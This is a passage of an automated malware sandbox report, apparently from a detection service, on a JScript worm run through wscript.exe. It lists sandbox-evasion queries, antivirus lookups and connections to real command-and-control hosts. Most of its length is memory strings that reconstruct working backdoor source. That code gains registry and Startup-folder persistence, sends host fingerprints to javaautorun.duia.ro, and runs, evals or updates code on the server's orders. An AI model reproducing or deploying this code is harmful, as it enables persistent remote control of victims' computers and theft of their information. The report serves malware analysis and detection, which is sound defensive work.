              Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 2022
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: wscript.exe, 00000001.00000003.378665321.00000228B3204000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.379252266.00000228B3205000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.892923244.0000025291BAA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401571383.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401665667.0000025291BAA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401299378.0000025291BAA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.854554678.0000020016790000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.882445640.0000020016851000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.848811043.0000026E2ADF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: wscript.exe, 00000006.00000002.869027680.0000026E2AEB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW?
              Source: wscript.exe, 00000008.00000002.853778146.0000029D8033B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW>'
              Source: wscript.exe, 00000001.00000002.851874113.00000228B3130000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.379274839.00000228B317E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.379481262.00000228B319F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.378710691.00000228B3161000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.844278843.000001531A030000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
              Source: wscript.exe, 00000001.00000003.378710691.00000228B3161000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\

              HIPS / PFW / Operating System Protection Evasion

              barindex
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\System32\wscript.exeDomain query: jbd231.duckdns.org
              Source: C:\Windows\System32\wscript.exeNetwork Connect: 109.248.150.138 2022
              Source: C:\Windows\System32\wscript.exeNetwork Connect: 154.120.126.87 5465
              Source: C:\Windows\System32\wscript.exeDomain query: javaautorun.duia.ro
              Source: C:\Windows\System32\wscript.exeNetwork Connect: 109.248.144.237 2022Jump to behavior
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rpwinmgmts:\\localhost\root\securitycenter3
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: displaynameq
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $volumeserialnumber
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: copyfile
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: namespace
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t:p_m
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :eval code// coded by v_b01 | sliemerez -> twitter : sliemerez
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var j = ["wscript.shell","scripting.filesystemobject","shell.application","microsoft.xmlhttp"];
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var g = ["hkcu","hklm","hkcu\\vjw0rm","\\software\\microsoft\\windows\\currentversion\\run\\","hklm\\software\\classes\\","reg_sz","\\defaulticon\\"];
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var y = ["winmgmts:","win32_logicaldisk","win32_operatingsystem",'antivirusproduct'];
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var sh = cr(0);
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var fs = cr(1);
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var spl = "|v|";
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var ch = "\\";
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var vn = "9/21" + "_" + ob(6);
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var fu = wscript.scriptfullname;
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var wn = wscript.scriptname;
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var u;
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: try {
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u = sh.regread(g[2]);
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: } catch(err) {
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var sv = fu.split("\\");
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if (":\\" + sv[1] == ":\\" + wn) {
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u = "true";
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sh.regwrite(g[2],u,g[5]);
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: } else {
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u = "false";
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ns();
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var p = pt('vre','');
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p = p.split(spl);
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if (p[0] === "cl") {
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wscript.quit(1);
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if (p[0] === "sc") {
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var s2 = ex("temp") + "\\" + p[2];
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var fi = fs.createtextfile(s2,true);
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fi.write(p[1]);
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fi.close();
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sh.run(s2);
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if (p[0] === "ex") {
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: eval(p[1]);
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if (p[0] === "rn") {
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var ri = fs.opentextfile(fu,1);
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var fr = ri.readall();
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ri.close();
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vn = vn.split("_");
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fr = fr.replace(vn[0],p[1]);
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var wi = fs.opentextfile(fu,2,false);
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wi.write(fr);
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wi.close();
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sh.run("wscript.exe //b \"" + fu + "\"");
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if (p[0] === "up") {
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var ctf = fs.createtextfile(s2,true);
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var gu = p[1];
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gu = gu.replace("|u|","|v|");
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ctf.write(gu);
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ctf.close();
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sh.run("wscript.exe //b \"" + s2 + "\"",6);
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if (p[0] === "un") {
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var s2 = p[1];
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var vdr = fu;
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var regi = "nothing!";
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s2 = s2.replace("%f",fu).replace("%n",wn).replace("%sfdr",vdr).replace("%rgne%",regi);
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: eval(s2);
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if (p[0] === "rf") {
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wscript.sleep(7000);
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: } while (true) ;
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: function ex(s) {
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return sh.expandenvironmentstrings("%" + s + "%");
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: function pt(c,a) {
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var x = cr(3);
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x.open('post','http://javaautorun.duia.ro:5465/' + c, false);
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x.setrequestheader("user-agent:",nf());
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x.send(a);
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return x.responsetext;
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: function nf() {
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var s,nt,i;
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if (fs.fileexists(ex("windir") + "\\microsoft.net\\framework\\v2.0.50727\\vbc.exe")) {
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nt ="yes";
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nt = "no";
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s = vn + ch + ex("computername") + ch + ex("username") + ch + ob(2) + ch + ob(4) + ch + ch + nt + ch + u + ch;
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return s;
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: function cr(n) {
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return new activexobject(j[n]);
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: function ob(n) {
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var s;
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if (n == 2) {
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s = getobject(y[0]).instancesof(y[2]);
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var en = new enumerator(s);
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: for (; !en.atend();en.movenext()) {
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var it = en.item();
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return it.caption;
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: break;
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if (n == 4) {
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var wmg = "winmgmts:\\\\localhost\\root\\securitycenter";
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s = getobject(wmg).instancesof(y[3]);
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var str = it.displayname;
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if (str !== '') {
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wmg = wmg + "2";
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: en = new enumerator(s);
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: it = en.item();
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return it.displayname;
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if (n==6) {
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s = getobject(y[0]).instancesof(y[1]);
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return it.volumeserialnumber;
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: function ns() {
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: try {
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var ap = cr(2);
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fs.copyfile(fu, ap.namespace(7).self.path + "\\" + wn,true);
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: } catch(err) {
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \jdkn7
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: number
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: description
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: message$
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: atend
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: message
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: item4
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: messagec
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ~/0\
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ~2&^
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: re", "
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ~5;^
              Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ~<2^
              Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wscript
              Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: scriptfullname
              Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: scriptname
              Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tryx$
              Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: regread@2<
              Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: catch@z@
              Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: split
              Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :\@1l
              Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: true@
              Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: regwrite@5
              Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: else@
              Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: false@
              Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: quit8
              Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: temp@!
              Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: createtextfile?
              Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: true@
              Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: write@
              Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: close@
              Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: run@h
              Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: eval@
